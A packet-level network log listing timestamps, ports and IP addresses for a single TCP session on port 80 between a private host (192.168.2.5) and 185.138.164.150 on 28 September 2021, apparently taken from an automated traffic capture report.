Sep 28, 2021 07:38:37.816421032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.816428900 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.816464901 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.817105055 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818758965 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818787098 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818809032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818813086 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.818826914 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818845987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818861008 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.818866968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818888903 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818890095 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.818907976 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818924904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818931103 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.818943024 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818959951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818975925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.818990946 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.818994045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819015026 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819017887 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.819035053 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819047928 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.819052935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819072008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819084883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.819140911 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.819605112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819628954 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819649935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.819674015 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.819978952 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820002079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820027113 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820034027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.820045948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820069075 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.820698977 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820748091 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.820808887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.820828915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.821119070 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.821937084 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823153019 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823174953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823199034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823208094 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823213100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.823220015 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823234081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823256969 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823276043 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823293924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823307991 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823319912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823333025 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823349953 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.823355913 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.823364973 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.823498011 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823518038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823540926 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.823585987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.823643923 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.824024916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.824048996 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.824062109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.824117899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.824899912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.824924946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.824951887 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.824965954 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825016022 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825390100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825467110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825489044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825508118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825509071 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825526953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825544119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825545073 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825582027 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825855017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825875998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825894117 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825911999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825915098 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825932026 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.825952053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.825968981 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.826008081 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.826726913 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.826752901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.826770067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.826797009 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.827264071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827286959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827307940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827321053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.827327013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827346087 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827347040 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.827363014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.827416897 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.828018904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828042030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828074932 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.828130960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828172922 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.828243017 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828263998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828310013 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.828332901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.828988075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829041004 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829045057 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.829058886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829078913 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829096079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829103947 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.829113960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829130888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829139948 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.829174995 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.829691887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829715967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829731941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.829760075 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.830446005 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830471039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830487013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830504894 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830503941 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.830528975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.830535889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830574989 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.830586910 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.831270933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831296921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831311941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831345081 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.831382990 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.831758022 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831780910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831799030 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.831849098 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.832083941 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832103968 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832120895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832135916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832164049 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.832187891 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.832195997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832215071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832238913 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.832904100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832933903 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.832967997 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.832969904 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833010912 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.833133936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833165884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833183050 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833203077 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833208084 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.833220959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833239079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.833252907 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.833278894 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.845674038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.845700979 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.845719099 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.845773935 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.853452921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853486061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853502035 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853513956 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.853562117 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.853810072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853817940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853883982 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853908062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853924990 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853941917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.853949070 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.853986025 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.854439974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.854530096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.854548931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.854566097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.854584932 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.854634047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.854768038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855107069 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855148077 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855164051 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855168104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855190992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855206013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855220079 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855276108 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855643034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855665922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855681896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855724096 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855742931 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855766058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855779886 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855782986 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855818987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855832100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.855837107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855854988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.855880976 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.856488943 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856514931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856548071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856569052 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.856597900 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.856837034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856858015 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856921911 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.856967926 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.856986046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.857002020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.857018948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.857033968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.857064962 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.858220100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858251095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858274937 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858299017 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.858356953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858374119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858402967 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.858417988 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.858484983 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.859740973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859766006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859781981 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859819889 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859843969 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.859895945 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859910965 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.859916925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859935999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859951973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859962940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.859970093 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.859991074 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.860100031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860135078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860171080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860182047 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.860374928 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860385895 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.860495090 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860559940 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.860572100 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860593081 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860610962 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860626936 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860640049 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.860645056 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.860665083 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.861248016 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861272097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861289024 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861316919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.861355066 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.861463070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861480951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861498117 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861536026 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861552954 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861556053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.861568928 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.861605883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.861975908 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862000942 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862019062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862071991 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.862143993 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862171888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862188101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862211943 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.862241030 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.862332106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862349033 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862369061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862405062 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.862677097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862696886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862714052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.862735987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.862771988 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.863210917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863234043 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863251925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863316059 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.863848925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863873959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863903046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.863903999 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.863955975 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.864088058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864115000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864134073 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864180088 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.864518881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864552975 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864568949 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864590883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.864634037 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.864837885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864859104 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864875078 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.864926100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.865565062 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.865591049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.865607023 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.865628958 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.865643024 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.865920067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.865927935 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.865942001 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866096973 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:37.866313934 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866336107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:37.866353035 CEST	80	49731	185.138.164.150	192.168.2.5
